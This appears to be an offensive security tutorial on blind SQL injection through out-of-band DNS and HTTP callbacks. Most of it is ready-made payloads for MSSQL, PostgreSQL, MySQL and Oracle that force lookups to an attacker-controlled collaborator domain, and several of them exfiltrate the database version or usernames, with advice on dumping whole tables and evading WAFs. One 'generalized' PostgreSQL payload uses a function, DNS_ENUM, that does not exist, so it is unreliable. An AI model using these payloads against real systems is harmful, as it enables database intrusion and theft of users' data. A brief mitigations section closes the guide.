🧠 Exploiting Blind SQL Injection Using Out-of-Band (OAST) Techniques
A Comprehensive Guide with Expanded Knowledge and Missing Details
🔍 Introduction
In modern web applications, developers often implement asynchronous processing to improve performance and user experience. This includes running certain operations — such as logging, analytics tracking, or background database queries — in separate threads or processes.
This architectural shift introduces a new challenge for attackers: when the vulnerable SQL query is executed asynchronously, it no longer directly affects the HTTP response. As a result:
- Traditional error-based SQL injection fails because errors are not returned.
- Time-based blind SQL injection becomes unreliable since the application doesn’t wait for the query to finish.
- The only viable method left is to exploit the vulnerability via out-of-band (OOB) techniques.
Out-of-band SQL injection (also known as OAST-based SQL injection) leverages external network interactions to extract data or confirm exploitation, even when the backend does not return any visible feedback.
⚠️ When OAST-Based SQL Injection Is Needed
You should consider using out-of-band techniques when:
- The SQL query is executed asynchronously.
- You cannot observe differences in response time or content.
- Error messages are suppressed or logged internally.
- The application uses firewalls or WAFs that block common SQLi payloads.
These conditions make traditional SQL injection techniques ineffective, but they do not prevent the database from performing network operations based on injected payloads.
📡 Why DNS Is the Preferred Protocol for OAST Attacks
Among various protocols (HTTP, SMB, FTP), DNS is typically the most effective for out-of-band exploitation due to several reasons:
✅ Advantages of DNS-Based Exfiltration
Using DNS, an attacker can force the database server to perform a lookup to a domain under their control — such as payload.example.com — allowing them to detect the interaction remotely.
🛠️ Tools for OAST Exploitation
1. Burp Collaborator (Professional Edition Only)
- Integrated into Burp Suite Professional.
- Generates unique subdomains like
abc123.oast.pro. - Detects inbound DNS, HTTP, and SMB requests triggered by payloads.
- Allows real-time polling to verify successful exploitation.
💡 Note: Burp Collaborator is the most reliable tool for OAST attacks due to its built-in detection logic and support across major databases.
2. Interact.sh (Open Source Alternative)
- A free, open-source alternative to Burp Collaborator.
- Hosted at https://interact.sh
- Generates unique domains like
abc123.interact.sh - Logs all incoming interactions (DNS, HTTP, LDAP, etc.)
curl https://interact.shReturns a unique ID you can use in your payload.
3. Custom DNS Server
Advanced red teamers may set up their own DNS servers to monitor for lookups. This requires:
- Hosting a public-facing DNS server.
- Configuring zone records to log queries.
- Parsing logs manually or via scripts.
While powerful, this approach is more complex and less stealthy than using services like Interact.sh or Burp Collaborator.
🧪 Database-Specific Payloads for OAST Exploitation
Each database has different capabilities for initiating external network connections. Below are common payloads used to trigger DNS lookups across popular RDBMS platforms.
⚠️ Always URL-encode special characters before sending these payloads.
1. Microsoft SQL Server (MSSQL)
Technique: xp_dirtree
Forces the server to attempt accessing a UNC path, which results in a DNS lookup.
'; EXEC master..xp_dirtree '\\\\COLLAB_DOMAIN\\test'--Replace COLLAB_DOMAIN with your OAST domain (e.g., abc123.oast.pro)
2. PostgreSQL
Technique: COPY + DNS resolution
DROP TABLE IF EXISTS table1;
CREATE TABLE table1(a TEXT);
COPY table1 FROM PROGRAM 'nslookup COLLAB_DOMAIN';
SELECT * FROM table1;Alternatively, using pg_sleep() is possible for time-based attacks, but for OAST:
SELECT * FROM dblink('host=COLLAB_DOMAIN user=x password=x dbname=x', 'SELECT 1') AS t(a TEXT);3. MySQL
Technique: LOAD_FILE() with UNC Path
AND LOAD_FILE(CONCAT('\\', 'COLLAB_DOMAIN', '\\test'))This forces MySQL to resolve the hostname in the UNC path, resulting in a DNS lookup.
4. Oracle
Technique: UTL_INADDR.GET_HOST_ADDRESS
AND UTL_INADDR.GET_HOST_ADDRESS('COLLAB_DOMAIN')This function resolves the IP address of a host, causing a DNS lookup.
Alternative: UTL_HTTP.REQUEST
BEGIN
UTL_HTTP.REQUEST('http://COLLAB_DOMAIN');
END;Triggers an HTTP request to the specified domain.
5. SQLite (Rarely Used for OAST)
SQLite lacks native support for outbound connections, making OAST exploitation rare unless integrated with external code.
🧬 Data Exfiltration via OAST
Beyond detecting the presence of a vulnerability, OAST techniques can be used to exfiltrate sensitive data from the database.
Example: Extracting Database Version via DNS Lookup
Suppose you want to extract the PostgreSQL version:
SELECT * FROM dblink('host='||(SELECT version())||'.oast.pro user=x password=x dbname=x', 'SELECT 1') AS t(a TEXT);This causes the database to perform a DNS lookup to a domain containing the version number, such as PostgreSQL_14.0.oast.pro.
Generalized Pattern for Data Extraction
'||(SELECT EXTRACT(EPOCH FROM DNS_ENUM((SELECT username FROM users LIMIT 1)||'.oast.pro')))--This payload:
- Queries the first username from the
userstable. - Appends
.oast.proto create a custom subdomain. - Triggers a DNS lookup to that subdomain.
- Burp Collaborator or Interact.sh logs the interaction, revealing the username.
By looping through rows (LIMIT 1 OFFSET n), you can exfiltrate entire tables.
🧱 Bypassing Filters and Restrictions
Modern applications often have protections like input sanitization, WAFs, or length restrictions. Here are some advanced techniques to bypass them:
1. Encoding Payloads
Use hexadecimal, base64, or Unicode encoding to evade simple filters.
Example (MySQL):
AND LOAD_FILE(CONCAT(0x5C5C, 'COLLAB_DOMAIN', 0x5C5C61))Which evaluates to:
AND LOAD_FILE('\\COLLAB_DOMAIN\\a')2. Whitespace Obfuscation
Replace spaces with tabs, comments, or encoded characters.
Example:
AND/**/LOAD_FILE(CONCAT('\\','COLLAB_DOMAIN','\\a'))3. Using Stored Procedures or Functions
Some databases allow chaining multiple SQL statements via stored procedures or functions to avoid triggering WAFs.
Example (PostgreSQL):
DO $$
BEGIN
PERFORM * FROM dblink('host=COLLAB_DOMAIN', 'SELECT 1');
END;
$$🧩 Real-World Use Cases
1. Blind Injection in Background Tasks
An application might store tracking cookies and process them later in a cron job or queue worker. Since the HTTP thread is unaffected, OAST is the only way to confirm exploitation.
2. Log Injection via Vulnerable Logging Systems
If a system logs user input into a database field that’s processed asynchronously, OAST payloads can still be used to extract data or pivot further.
3. WAF Evasion
When traditional SQL injection signatures are detected and blocked, OAST payloads can bypass detection by appearing innocuous (e.g., just a string concatenation).
🧼 Mitigations & Best Practices
To protect against OAST-based SQL injection:
For Developers:
- Use parameterized queries (prepared statements).
- Avoid dynamic SQL concatenation.
- Validate and sanitize all user inputs.
- Implement strict output encoding.
For Security Teams:
- Monitor DNS logs for suspicious outbound queries.
- Restrict unnecessary DNS egress (e.g., via firewall rules or proxy).
- Use WAFs configured to detect OAST payloads.
- Regularly audit third-party dependencies for SQL injection risks.
💬 Final Thoughts
Out-of-band SQL injection represents a powerful yet often overlooked class of vulnerabilities. Unlike traditional SQL injection methods, OAST allows attackers to bypass visibility limitations and extract data even in highly restricted environments.
Understanding how to detect and exploit these flaws is essential for both offensive security professionals and defenders looking to secure their systems.
Whether you’re solving a lab or testing a real-world application, mastering OAST-based SQL injection gives you the tools to identify and mitigate one of the most insidious types of injection flaws.
Happy hacking! 🎯🔒
